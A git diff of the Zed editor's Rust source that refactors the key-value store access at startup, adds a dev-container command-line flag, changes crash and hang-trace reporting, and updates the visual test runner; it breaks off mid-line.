res.set_toolkit_path(explicit_rc_toolkit_path.as_str()); + } + res.set_icon(icon.to_str().unwrap()); + res.set("FileDescription", "Zed"); + res.set("ProductName", "Zed"); - if let Err(e) = res.compile() { - eprintln!("{}", e); - std::process::exit(1); + if let Err(e) = res.compile() { + eprintln!("{}", e); + std::process::exit(1); + } } } } diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index f429c32df79b6a1a62a82832e69d412800544e8a..5937b91665b892084aa7b4d1f8b94ec1e2d864da 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -10,11 +10,11 @@ use agent_ui::AgentPanel; use anyhow::{Context as _, Error, Result}; use clap::Parser; use cli::FORCE_CLI_MODE_ENV_VAR_NAME; -use client::{Client, ProxySettings, UserStore, parse_zed_link}; +use client::{Client, ProxySettings, RefreshLlmTokenListener, UserStore, parse_zed_link}; use collab_ui::channel_view::ChannelView; use collections::HashMap; use crashes::InitCrashHandler; -use db::kvp::{GLOBAL_KEY_VALUE_STORE, KEY_VALUE_STORE}; +use db::kvp::{GlobalKeyValueStore, KeyValueStore}; use editor::Editor; use extension::ExtensionHostProxy; use fs::{Fs, RealFs}; @@ -48,10 +48,11 @@ use std::{ path::{Path, PathBuf}, process, rc::Rc, - sync::{Arc, OnceLock}, + sync::{Arc, LazyLock, OnceLock}, time::Instant, }; use theme::{ActiveTheme, GlobalTheme, ThemeRegistry}; +use theme_settings::load_user_theme; use util::{ResultExt, TryFutureExt, maybe}; use uuid::Uuid; use workspace::{ @@ -325,17 +326,27 @@ fn main() { let app = Application::with_platform(gpui_platform::current_platform(false)).with_assets(Assets); + let app_db = db::AppDatabase::new(); let system_id = app.background_executor().spawn(system_id()); - let installation_id = app.background_executor().spawn(installation_id()); - let session_id = Uuid::new_v4().to_string(); - let session = app + let installation_id = app .background_executor() - .spawn(Session::new(session_id.clone())); + .spawn(installation_id(KeyValueStore::from_app_db(&app_db))); + let session_id = Uuid::new_v4().to_string(); + let session = app.background_executor().spawn(Session::new( + session_id.clone(), + KeyValueStore::from_app_db(&app_db), + )); crashes::init( InitCrashHandler { session_id, - zed_version: app_version.to_string(), + // strip the build and channel information from the version string, we send them separately + zed_version: semver::Version::new( + app_version.major, + app_version.minor, + app_version.patch, + ) + .to_string(), binary: "zed".to_string(), release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), commit_sha: app_commit_sha @@ -430,10 +441,8 @@ fn main() { } }); app.on_reopen(move |cx| { - if let Some(app_state) = AppState::try_global(cx).and_then(|app_state| app_state.upgrade()) - { + if let Some(app_state) = AppState::try_global(cx) { cx.spawn({ - let app_state = app_state; async move |cx| { if let Err(e) = restore_or_create_workspace(app_state, cx).await { fail_to_open_window_async(e, cx) @@ -445,7 +454,8 @@ fn main() { }); app.run(move |cx| { - let db_trusted_paths = match workspace::WORKSPACE_DB.fetch_trusted_worktrees() { + cx.set_global(app_db); + let db_trusted_paths = match workspace::WorkspaceDb::global(cx).fetch_trusted_worktrees() { Ok(trusted_paths) => trusted_paths, Err(e) => { log::error!("Failed to do initial trusted worktrees fetch: {e:#}"); @@ -527,6 +537,7 @@ fn main() { tx.send(Some(options)).log_err(); }) .detach(); + ui::on_new_scrollbars::(cx); let node_runtime = NodeRuntime::new(client.http_client(), Some(shell_env_loaded_rx), rx); @@ -573,6 +584,21 @@ fn main() { session.id().to_owned(), cx, ); + cx.subscribe(&user_store, { + let telemetry = telemetry.clone(); + move |_, evt: &client::user::Event, _| match evt { + client::user::Event::PrivateUserInfoUpdated => { + crashes::set_user_info(crashes::UserInfo { + metrics_id: telemetry.metrics_id().map(|s| s.to_string()), + is_staff: telemetry.is_staff(), + }); + } + _ => {} + } + }) + .detach(); + + let is_new_install = matches!(&installation_id, Some(IdType::New(_))); // We should rename these in the future to `first app open`, `first app open for release channel`, and `app open` if let (Some(system_id), Some(installation_id)) = (&system_id, &installation_id) { @@ -601,7 +627,7 @@ fn main() { node_runtime, session: app_session, }); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); auto_update::init(client.clone(), cx); dap_adapters::init(cx); @@ -615,7 +641,7 @@ fn main() { cx, ); - theme::init(theme::LoadThemes::All(Box::new(Assets)), cx); + theme_settings::init(theme::LoadThemes::All(Box::new(Assets)), cx); eager_load_active_theme_and_icon_theme(fs.clone(), cx); theme_extension::init( extension_host_proxy, @@ -638,15 +664,19 @@ fn main() { ); copilot_ui::init(&app_state, cx); - supermaven::init(app_state.client.clone(), cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + ); language_models::init(app_state.user_store.clone(), app_state.client.clone(), cx); acp_tools::init(cx); zed::telemetry_log::init(cx); zed::remote_debug::init(cx); edit_prediction_ui::init(cx); web_search::init(cx); - web_search_providers::init(app_state.client.clone(), cx); + web_search_providers::init(app_state.client.clone(), app_state.user_store.clone(), cx); snippet_provider::init(cx); edit_prediction_registry::init(app_state.client.clone(), app_state.user_store.clone(), cx); let prompt_builder = PromptBuilder::load(app_state.fs.clone(), stdout_is_a_pty(), cx); @@ -657,9 +687,9 @@ fn main() { ); agent_ui::init( app_state.fs.clone(), - app_state.client.clone(), - prompt_builder.clone(), + prompt_builder, app_state.languages.clone(), + is_new_install, false, cx, ); @@ -716,6 +746,7 @@ fn main() { git_graph::init(cx); feedback::init(cx); markdown_preview::init(cx); + csv_preview::init(cx); svg_preview::init(cx); onboarding::init(cx); settings_ui::init(cx); @@ -787,11 +818,12 @@ fn main() { let fs = app_state.fs.clone(); load_user_themes_in_background(fs.clone(), cx); watch_themes(fs.clone(), cx); + #[cfg(debug_assertions)] watch_languages(fs.clone(), app_state.languages.clone(), cx); let menus = app_menus(cx); cx.set_menus(menus); - initialize_workspace(app_state.clone(), prompt_builder, cx); + initialize_workspace(app_state.clone(), cx); cx.activate(true); @@ -830,13 +862,13 @@ fn main() { diff_paths, wsl, diff_all: diff_all_mode, + dev_container: args.dev_container, }) } match open_rx - .try_next() + .try_recv() .ok() - .flatten() .and_then(|request| OpenRequest::parse(request, cx).log_err()) { Some(request) => { @@ -895,7 +927,9 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut }) .detach_and_log_err(cx); } - OpenRequestKind::AgentPanel { initial_prompt } => { + OpenRequestKind::AgentPanel { + external_source_prompt, + } => { cx.spawn(async move |cx| { let multi_workspace = workspace::get_any_active_multi_workspace(app_state, cx.clone()).await?; @@ -904,7 +938,11 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut multi_workspace.workspace().update(cx, |workspace, cx| { if let Some(panel) = workspace.focus_panel::(window, cx) { panel.update(cx, |panel, cx| { - panel.new_external_thread_with_text(initial_prompt, window, cx); + panel.new_agent_thread_with_external_source_prompt( + external_source_prompt, + window, + cx, + ); }); } }); @@ -960,21 +998,19 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut }) .await?; - let thread_metadata = acp_thread::AgentSessionInfo { - session_id, - cwd: None, - title: Some(format!("🔗 {}", response.title).into()), - updated_at: Some(chrono::Utc::now()), - meta: None, - }; - let sharer_username = response.sharer_username.clone(); multi_workspace.update(cx, |_, window, cx| { workspace.update(cx, |workspace, cx| { if let Some(panel) = workspace.panel::(cx) { panel.update(cx, |panel, cx| { - panel.open_thread(thread_metadata, window, cx); + panel.open_thread( + session_id, + None, + Some(format!("🔗 {}", response.title).into()), + window, + cx, + ); }); panel.focus_handle(cx).focus(window, cx); } @@ -1177,6 +1213,7 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut } let mut task = None; + let dev_container = request.dev_container; if !request.open_paths.is_empty() || !request.diff_paths.is_empty() { let app_state = app_state.clone(); task = Some(cx.spawn(async move |cx| { @@ -1187,7 +1224,10 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut &request.diff_paths, request.diff_all, app_state, - workspace::OpenOptions::default(), + workspace::OpenOptions { + open_in_dev_container: dev_container, + ..Default::default() + }, cx, ) .await?; @@ -1277,42 +1317,37 @@ async fn authenticate(client: Arc, cx: &AsyncApp) -> Result<()> { async fn system_id() -> Result { let key_name = "system_id".to_string(); + let db = GlobalKeyValueStore::global(); - if let Ok(Some(system_id)) = GLOBAL_KEY_VALUE_STORE.read_kvp(&key_name) { + if let Ok(Some(system_id)) = db.read_kvp(&key_name) { return Ok(IdType::Existing(system_id)); } let system_id = Uuid::new_v4().to_string(); - GLOBAL_KEY_VALUE_STORE - .write_kvp(key_name, system_id.clone()) - .await?; + db.write_kvp(key_name, system_id.clone()).await?; Ok(IdType::New(system_id)) } -async fn installation_id() -> Result { +async fn installation_id(db: KeyValueStore) -> Result { let legacy_key_name = "device_id".to_string(); let key_name = "installation_id".to_string(); // Migrate legacy key to new key - if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&legacy_key_name) { - KEY_VALUE_STORE - .write_kvp(key_name, installation_id.clone()) - .await?; - KEY_VALUE_STORE.delete_kvp(legacy_key_name).await?; + if let Ok(Some(installation_id)) = db.read_kvp(&legacy_key_name) { + db.write_kvp(key_name, installation_id.clone()).await?; + db.delete_kvp(legacy_key_name).await?; return Ok(IdType::Existing(installation_id)); } - if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&key_name) { + if let Ok(Some(installation_id)) = db.read_kvp(&key_name) { return Ok(IdType::Existing(installation_id)); } let installation_id = Uuid::new_v4().to_string(); - KEY_VALUE_STORE - .write_kvp(key_name, installation_id.clone()) - .await?; + db.write_kvp(key_name, installation_id.clone()).await?; Ok(IdType::New(installation_id)) } @@ -1321,22 +1356,17 @@ pub(crate) async fn restore_or_create_workspace( app_state: Arc, cx: &mut AsyncApp, ) -> Result<()> { + let kvp = cx.update(|cx| KeyValueStore::global(cx)); if let Some((multi_workspaces, remote_workspaces)) = restorable_workspaces(cx, &app_state).await { let mut results: Vec> = Vec::new(); let mut tasks = Vec::new(); for multi_workspace in multi_workspaces { - match restore_multiworkspace(multi_workspace, app_state.clone(), cx).await { - Ok(result) => { - for error in result.errors { - log::error!("Failed to restore workspace in group: {error:#}"); - results.push(Err(error)); - } - } - Err(e) => { - results.push(Err(e)); - } + if let Err(error) = restore_multiworkspace(multi_workspace, app_state.clone(), cx).await + { + log::error!("Failed to restore workspace: {error:#}"); + results.push(Err(error)); } } @@ -1398,7 +1428,7 @@ pub(crate) async fn restore_or_create_workspace( .update(cx, |multi_workspace, _, cx| { multi_workspace.workspace().update(cx, |workspace, cx| { workspace.show_toast( - Toast::new(NotificationId::unique::<()>(), message), + Toast::new(NotificationId::unique::<()>(), message.clone()), cx, ) }); @@ -1410,14 +1440,26 @@ pub(crate) async fn restore_or_create_workspace( }); // If we couldn't show a toast (no windows opened successfully), - // we've already logged the errors above, so the user can check logs + // open a fallback empty workspace and show the error there if !toast_shown { - log::error!( - "Failed to show notification for window restoration errors, because no workspace windows were available." - ); + log::error!("All workspace restorations failed. Opening fallback empty workspace."); + cx.update(|cx| { + workspace::open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, _window, cx| { + workspace.show_toast( + Toast::new(NotificationId::unique::<()>(), message), + cx, + ); + }, + ) + }) + .await?; } } - } else if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) { + } else if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) { cx.update(|cx| show_onboarding_view(app_state, cx)).await?; } else { cx.update(|cx| { @@ -1453,7 +1495,8 @@ async fn restorable_workspaces( let (remote_workspaces, local_workspaces) = locations .into_iter() .partition(|sw| matches!(sw.location, SerializedWorkspaceLocation::Remote(_))); - let multi_workspaces = workspace::read_serialized_multi_workspaces(local_workspaces); + let multi_workspaces = + cx.update(|cx| workspace::read_serialized_multi_workspaces(local_workspaces, cx)); Some((multi_workspaces, remote_workspaces)) } @@ -1461,7 +1504,12 @@ pub(crate) async fn restorable_workspace_locations( cx: &mut AsyncApp, app_state: &Arc, ) -> Option> { - let mut restore_behavior = cx.update(|cx| WorkspaceSettings::get(None, cx).restore_on_startup); + let (mut restore_behavior, db) = cx.update(|cx| { + ( + WorkspaceSettings::get(None, cx).restore_on_startup, + workspace::WorkspaceDb::global(cx), + ) + }); let session_handle = app_state.session.clone(); let (last_session_id, last_session_window_stack) = cx.update(|cx| { @@ -1484,7 +1532,7 @@ pub(crate) async fn restorable_workspace_locations( match restore_behavior { workspace::RestoreOnStartupBehavior::LastWorkspace => { - workspace::last_opened_workspace_location(app_state.fs.as_ref()) + workspace::last_opened_workspace_location(&db, app_state.fs.as_ref()) .await .map(|(workspace_id, location, paths)| { vec![SessionWorkspace { @@ -1500,6 +1548,7 @@ pub(crate) async fn restorable_workspace_locations( let ordered = last_session_window_stack.is_some(); let mut locations = workspace::last_session_workspace_locations( + &db, &last_session_id, last_session_window_stack, app_state.fs.as_ref(), @@ -1542,8 +1591,14 @@ fn init_paths() -> HashMap> { }) } +pub(crate) static FORCE_CLI_MODE: LazyLock = LazyLock::new(|| { + let env_var = std::env::var(FORCE_CLI_MODE_ENV_VAR_NAME).ok().is_some(); + unsafe { std::env::remove_var(FORCE_CLI_MODE_ENV_VAR_NAME) }; + env_var +}); + fn stdout_is_a_pty() -> bool { - std::env::var(FORCE_CLI_MODE_ENV_VAR_NAME).ok().is_none() && io::stdout().is_terminal() + !*FORCE_CLI_MODE && io::stdout().is_terminal() } #[derive(Parser, Debug)] @@ -1584,6 +1639,13 @@ struct Args { #[arg(long, value_name = "USER@DISTRO")] wsl: Option, + /// Open the project in a dev container. + /// + /// Automatically triggers "Reopen in Dev Container" if a `.devcontainer/` + /// configuration is found in the project directory. + #[arg(long)] + dev_container: bool, + /// Instructs zed to run as a dev server on this machine. (not implemented) #[arg(long)] dev_server_token: Option, @@ -1732,8 +1794,24 @@ fn load_user_themes_in_background(fs: Arc, cx: &mut App) { })?; } } - theme_registry.load_user_themes(themes_dir, fs).await?; - cx.update(GlobalTheme::reload_theme); + + let mut theme_paths = fs + .read_dir(themes_dir) + .await + .with_context(|| format!("reading themes from {themes_dir:?}"))?; + + while let Some(theme_path) = theme_paths.next().await { + let Some(theme_path) = theme_path.log_err() else { + continue; + }; + let Some(bytes) = fs.load_bytes(&theme_path).await.log_err() else { + continue; + }; + + load_user_theme(&theme_registry, &bytes).log_err(); + } + + cx.update(theme_settings::reload_theme); anyhow::Ok(()) } }) @@ -1752,13 +1830,10 @@ fn watch_themes(fs: Arc, cx: &mut App) { for event in paths { if fs.metadata(&event.path).await.ok().flatten().is_some() { let theme_registry = cx.update(|cx| ThemeRegistry::global(cx)); - if theme_registry - .load_user_theme(&event.path, fs.clone()) - .await - .log_err() - .is_some() + if let Some(bytes) = fs.load_bytes(&event.path).await.log_err() + && load_user_theme(&theme_registry, &bytes).log_err().is_some() { - cx.update(GlobalTheme::reload_theme); + cx.update(theme_settings::reload_theme); } } } @@ -1772,7 +1847,7 @@ fn watch_languages(fs: Arc, languages: Arc, cx: &m use std::time::Duration; cx.background_spawn(async move { - let languages_src = Path::new("crates/languages/src"); + let languages_src = Path::new("crates/grammars/src"); let Some(languages_src) = fs.canonicalize(languages_src).await.log_err() else { return; }; @@ -1802,9 +1877,6 @@ fn watch_languages(fs: Arc, languages: Arc, cx: &m .detach(); } -#[cfg(not(debug_assertions))] -fn watch_languages(_fs: Arc, _languages: Arc, _cx: &mut App) {} - fn dump_all_gpui_actions() { #[derive(Debug, serde::Serialize)] struct ActionDef { diff --git a/crates/zed/src/reliability.rs b/crates/zed/src/reliability.rs index b291b9c8493db75e20282c8c9bc5a3750fb5e705..e6c3821507cffb0d6e46f9634a646a009b73ddc3 100644 --- a/crates/zed/src/reliability.rs +++ b/crates/zed/src/reliability.rs @@ -22,7 +22,11 @@ use crate::STARTUP_TIME; const MAX_HANG_TRACES: usize = 3; pub fn init(client: Arc, cx: &mut App) { - monitor_hangs(cx); + if cfg!(debug_assertions) { + log::info!("Debug assertions enabled, skipping hang monitoring"); + } else { + monitor_hangs(cx); + } cx.on_flags_ready({ let client = client.clone(); @@ -144,7 +148,7 @@ fn cleanup_old_hang_traces() { entry .path() .extension() - .is_some_and(|ext| ext == "miniprof") + .is_some_and(|ext| ext == "json" || ext == "miniprof") }) .collect(); @@ -175,7 +179,7 @@ fn save_hang_trace( .collect::>(); let trace_path = paths::hang_traces_dir().join(&format!( - "hang-{}.miniprof", + "hang-{}.miniprof.json", hang_time.format("%Y-%m-%d_%H-%M-%S") )); @@ -193,7 +197,7 @@ fn save_hang_trace( entry .path() .extension() - .is_some_and(|ext| ext == "miniprof") + .is_some_and(|ext| ext == "json" || ext == "miniprof") }) .collect(); @@ -288,16 +292,23 @@ async fn upload_minidump( form = form.text("minidump_error", minidump_error); } - if let Some(id) = client.telemetry().metrics_id() { - form = form.text("sentry[user][id]", id.to_string()); + if let Some(is_staff) = &metadata + .user_info + .as_ref() + .and_then(|user_info| user_info.is_staff) + { form = form.text( "sentry[user][is_staff]", - if client.telemetry().is_staff().unwrap_or_default() { - "true" - } else { - "false" - }, + if *is_staff { "true" } else { "false" }, ); + } + + if let Some(metrics_id) = metadata + .user_info + .as_ref() + .and_then(|user_info| user_info.metrics_id.as_ref()) + { + form = form.text("sentry[user][id]", metrics_id.clone()); } else if let Some(id) = client.telemetry().installation_id() { form = form.text("sentry[user][id]", format!("installation-{}", id)) } diff --git a/crates/zed/src/visual_test_runner.rs b/crates/zed/src/visual_test_runner.rs index 0ae98d510aa34b05f7fa1766176f21ea353394d9..b59123a1a159487f802210f3916e16856daf8e61 100644 --- a/crates/zed/src/visual_test_runner.rs +++ b/crates/zed/src/visual_test_runner.rs @@ -42,6 +42,55 @@ fn main() { std::process::exit(1); } +#[cfg(target_os = "macos")] +fn main() { + // Set ZED_STATELESS early to prevent file system access to real config directories + // This must be done before any code accesses zed_env_vars::ZED_STATELESS + // SAFETY: We're at the start of main(), before any threads are spawned + unsafe { + std::env::set_var("ZED_STATELESS", "1"); + } + + env_logger::builder() + .filter_level(log::LevelFilter::Info) + .init(); + + let update_baseline = std::env::var("UPDATE_BASELINE").is_ok(); + + // Create a temporary directory for test files + // Canonicalize the path to resolve symlinks (on macOS, /var -> /private/var) + // which prevents "path does not exist" errors during worktree scanning + // Use keep() to prevent auto-cleanup - background worktree tasks may still be running + // when tests complete, so we let the OS clean up temp directories on process exit + let temp_dir = tempfile::tempdir().expect("Failed to create temp directory"); + let temp_path = temp_dir.keep(); + let canonical_temp = temp_path + .canonicalize() + .expect("Failed to canonicalize temp directory"); + let project_path = canonical_temp.join("project"); + std::fs::create_dir_all(&project_path).expect("Failed to create project directory"); + + // Create test files in the real filesystem + create_test_files(&project_path); + + let test_result = std::panic::catch_unwind(|| run_visual_tests(project_path, update_baseline)); + + // Note: We don't delete temp_path here because background worktree tasks may still + // be running. The directory will be cleaned up when the process exits or by the OS. + + match test_result { + Ok(Ok(())) => {} + Ok(Err(e)) => { + eprintln!("Visual tests failed: {}", e); + std::process::exit(1); + } + Err(_) => { + eprintln!("Visual tests panicked"); + std::process::exit(1); + } + } +} + // All macOS-specific imports grouped together #[cfg(target_os = "macos")] use { @@ -50,18 +99,17 @@ use { agent_servers::{AgentServer, AgentServerDelegate}, anyhow::{Context as _, Result}, assets::Assets, - chrono::{Duration as ChronoDuration, Utc}, editor::display_map::DisplayRow, feature_flags::FeatureFlagAppExt as _, git_ui::project_diff::ProjectDiff, gpui::{ - App, AppContext as _, Bounds, KeyBinding, Modifiers, SharedString, VisualTestAppContext, + App, AppContext as _, Bounds, Entity, KeyBinding, Modifiers, VisualTestAppContext, WindowBounds, WindowHandle, WindowOptions, point, px, size, }, image::RgbaImage, + project::{AgentId, Project}, project_panel::ProjectPanel, - recent_projects::RecentProjectEntry, - settings::{NotifyWhenAgentWaiting, Settings as _}, + settings::{NotifyWhenAgentWaiting, PlaySoundWhenAgentDone, Settings as _}, settings_ui::SettingsWindow, std::{ any::Any, @@ -71,7 +119,7 @@ use { time::Duration, }, util::ResultExt as _, - workspace::{AppState, MultiWorkspace, Workspace, WorkspaceId}, + workspace::{AppState, MultiWorkspace, Workspace}, zed_actions::OpenSettingsAt, }; @@ -97,55 +145,6 @@ mod constants { #[cfg(target_os = "macos")] use constants::*; -#[cfg(target_os = "macos")] -fn main() { - // Set ZED_STATELESS early to prevent file system access to real config directories - // This must be done before any code accesses zed_env_vars::ZED_STATELESS - // SAFETY: We're at the start of main(), before any threads are spawned - unsafe { - std::env::set_var("ZED_STATELESS", "1"); - } - - env_logger::builder() - .filter_level(log::LevelFilter::Info) - .init(); - - let update_baseline = std::env::var("UPDATE_BASELINE").is_ok(); - - // Create a temporary directory for test files - // Canonicalize the path to resolve symlinks (on macOS, /var -> /private/var) - // which prevents "path does not exist" errors during worktree scanning - // Use keep() to prevent auto-cleanup - background worktree tasks may still be running - // when tests complete, so we let the OS clean up temp directories on process exit - let temp_dir = tempfile::tempdir().expect("Failed to create temp directory"); - let temp_path = temp_dir.keep(); - let canonical_temp = temp_path - .canonicalize() - .expect("Failed to canonicalize temp directory"); - let project_path = canonical_temp.join("project"); - std::fs::create_dir_all(&project_path).expect("Failed to create project directory"); - - // Create test files in the real filesystem - create_test_files(&project_path); - - let test_result = std::panic::catch_unwind(|| run_visual_tests(project_path, update_baseline)); - - // Note: We don't delete temp_path here because background worktree tasks may still - // be running. The directory will be cleaned up when the process exits or by the OS. - - match test_result { - Ok(Ok(())) => {} - Ok(Err(e)) => { - eprintln!("Visual tests failed: {}", e); - std::process::exit(1); - } - Err(_) => { - eprintln!("Visual tests panicked"); - std::process::exit(1); - } - } -} - #[cfg(target_os = "macos")] fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> { // Create the visual test context with deterministic task scheduling @@ -171,13 +170,13 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> // Set the global app state so settings_ui and other subsystems can find it cx.update(|cx| { - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); }); // Initialize all Zed subsystems cx.update(|cx| { gpui_tokio::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&app_state.client, cx); audio::init(cx); workspace::init(app_state.clone(), cx); @@ -202,7 +201,12 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> }); prompt_store::init(cx); let prompt_builder = prompt_store::PromptBuilder::load(app_state.fs.clone(), false, cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + client::RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + ); language_models::init(app_state.user_store.clone(), app_state.client.clone(), cx); git_ui::init(cx); project::AgentRegistryStore::init_global( @@ -212,9 +216,9 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> ); agent_ui::init( app_state.fs.clone(), - app_state.client.clone(), prompt_builder, app_state.languages.clone(), + true, false, cx, ); @@ -232,7 +236,7 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> agent_settings::AgentSettings::override_global( agent_settings::AgentSettings { notify_when_agent_waiting: NotifyWhenAgentWaiting::Never, - play_sound_when_agent_done: false, + play_sound_when_agent_done: PlaySoundWhenAgentDone::Never, ..agent_settings::AgentSettings::get_global(cx).clone() }, cx, @@ -548,6 +552,27 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> } } + // Run Test 11: Thread target selector visual tests + #[cfg(feature = "visual-tests")] + { + println!("\n--- Test 11: start_thread_in_selector (6 variants) ---"); + match run_start_thread_in_selector_visual_tests(app_state.clone(), &mut cx, update_baseline) + { + Ok(TestResult::Passed) => { + println!("✓ start_thread_in_selector: PASSED"); + passed += 1; + } + Ok(TestResult::BaselineUpdated(_)) => { + println!("✓ start_thread_in_selector: Baselines updated"); + updated += 1; + } + Err(e) => { + eprintln!("✗ start_thread_in_selector: FAILED - {}", e); + failed += 1; + } + } + } + // Run Test 9: Tool Permissions Settings UI visual test println!("\n--- Test 9: tool_permissions_settings ---"); match run_tool_permissions_visual_tests(app_state.clone(), &mut cx, update_baseline) { @@ -945,7 +970,7 @@ fn init_app_state(cx: &mut App) -> Arc { let user_store = cx.new(|cx| client::UserStore::new(client.clone(), cx)); let workspace_store = cx.new(|cx| workspace::WorkspaceStore::new(client.clone(), cx)); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&client, cx); let app_state = Arc::new(AppState { @@ -958,7 +983,7 @@ fn init_app_state(cx: &mut App) -> Arc { build_window_options: |_, _| Default::default(), session, }); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); app_state } @@ -1939,13 +1964,14 @@ impl AgentServer for StubAgentServer { ui::IconName::ZedAssistant } - fn name(&self) -> SharedString { + fn agent_id(&self) -> AgentId { "Visual Test Agent".into() } fn connect( &self, _delegate: AgentServerDelegate, + _project: Entity, _cx: &mut App, ) -> gpui::Task>> { gpui::Task::ready(Ok(Rc::new(self.connection.clone()))) @@ -2011,32 +2037,9 @@ fn run_agent_thread_view_test( // Create the necessary entities for the ReadFileTool let action_log = cx.update(|cx| cx.new(|_| action_log::ActionLog::new(project.clone()))); - let context_server_registry = cx.update(|cx| { - cx.new(|cx| agent::ContextServerRegistry::new(project.read(cx).context_server_store(), cx)) - }); - let fake_model = Arc::new(language_model::fake_provider::FakeLanguageModel::default()); - let project_context = cx.update(|cx| cx.new(|_| prompt_store::ProjectContext::default())); - - // Create the agent Thread - let thread = cx.update(|cx| { - cx.new(|cx| { - agent::Thread::new( - project.clone(), - project_context, - context_server_registry, - agent::Templates::new(), - Some(fake_model), - cx, - ) - }) - }); // Create the ReadFileTool - let tool = Arc::new(agent::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let tool = Arc::new(agent::ReadFileTool::new(project.clone(), action_log, true)); // Create a test event stream to capture tool output let (event_stream, mut event_receiver) = agent::ToolCallEventStream::test(); @@ -2068,7 +2071,7 @@ fn run_agent_thread_view_test( let mut tool_content: Vec = Vec::new(); let mut tool_locations: Vec = Vec::new(); - while let Ok(Some(event)) = event_receiver.try_next() { + while let Ok(event) = event_receiver.try_recv() { if let Ok(agent::ThreadEvent::ToolCallUpdate(acp_thread::ToolCallUpdate::UpdateFields( update, ))) = event @@ -2135,16 +2138,10 @@ fn run_agent_thread_view_test( }) .context("Failed to get workspace handle")?; - let prompt_builder = - cx.update(|cx| prompt_store::PromptBuilder::load(app_state.fs.clone(), false, cx)); cx.background_executor.allow_parking(); let panel = cx .foreground_executor - .block_test(AgentPanel::load( - weak_workspace, - prompt_builder, - async_window_cx, - )) + .block_test(AgentPanel::load(weak_workspace, async_window_cx)) .context("Failed to load AgentPanel")?; cx.background_executor.forbid_parking(); @@ -2530,16 +2527,6 @@ fn run_multi_workspace_sidebar_visual_tests( std::fs::create_dir_all(&workspace1_dir)?; std::fs::create_dir_all(&workspace2_dir)?; - // Create directories for recent projects (they must exist on disk for display) - let recent1_dir = canonical_temp.join("tiny-project"); - let recent2_dir = canonical_temp.join("font-kit"); - let recent3_dir = canonical_temp.join("ideas"); - let recent4_dir = canonical_temp.join("tmp"); - std::fs::create_dir_all(&recent1_dir)?; - std::fs::create_dir_all(&recent2_dir)?; - std::fs::create_dir_all(&recent3_dir)?; - std::fs::create_dir_all(&recent4_dir)?; - // Enable the agent-v2 feature flag so multi-workspace is active cx.update(|cx| { cx.update_flags(true, vec!["agent-v2".to_string()]); @@ -2606,7 +2593,7 @@ fn run_multi_workspace_sidebar_visual_tests( }); cx.new(|cx| { let mut multi_workspace = MultiWorkspace::new(workspace1, window, cx); - multi_workspace.activate(workspace2, cx); + multi_workspace.activate(workspace2, window, cx); multi_workspace }) }, @@ -2619,7 +2606,7 @@ fn run_multi_workspace_sidebar_visual_tests( // Add worktree to workspace 1 (index 0) so it shows as "private-test-remote" let add_worktree1_task = multi_workspace_window .update(cx, |multi_workspace, _window, cx| { - let workspace1 = &multi_workspace.workspaces()[0]; + let workspace1 = multi_workspace.workspaces().next().unwrap(); let project = workspace1.read(cx).project().clone(); project.update(cx, |project, cx| { project.find_or_create_worktree(&workspace1_dir, true, cx) @@ -2638,7 +2625,7 @@ fn run_multi_workspace_sidebar_visual_tests( // Add worktree to workspace 2 (index 1) so it shows as "zed" let add_worktree2_task = multi_workspace_window .update(cx, |multi_workspace, _window, cx| { - let workspace2 = &multi_workspace.workspaces()[1]; + let workspace2 = multi_workspace.workspaces().nth(1).unwrap(); let project = workspace2.read(cx).project().clone(); project.update(cx, |project, cx| { project.find_or_create_worktree(&workspace2_dir, true, cx) @@ -2657,105 +2644,102 @@ fn run_multi_workspace_sidebar_visual_tests( // Switch to workspace 1 so it's highlighted as active (index 0) multi_workspace_window .update(cx, |multi_workspace, window, cx| { - multi_workspace.activate_index(0, window, cx); + let workspace = multi_workspace.workspaces().next().unwrap().clone(); + multi_workspace.activate(workspace, window, cx); }) .context("Failed to activate workspace 1")?; cx.run_until_parked(); - // Create the sidebar and register it on the MultiWorkspace - let sidebar = multi_workspace_window - .update(cx, |_multi_workspace, window, cx| { - let multi_workspace_handle = cx.entity(); + // Create the sidebar outside the MultiWorkspace update to avoid a + // re-entrant read panic (Sidebar::new reads the MultiWorkspace). + let sidebar = cx + .update_window(multi_workspace_window.into(), |root_view, window, cx| { + let multi_workspace_handle: Entity = root_view.downcast().unwrap(); cx.new(|cx| sidebar::Sidebar::new(multi_workspace_handle, window, cx)) }) .context("Failed to create sidebar")?; multi_workspace_window - .update(cx, |multi_workspace, window, cx| { - multi_workspace.register_sidebar(sidebar.clone(), window, cx); + .update(cx, 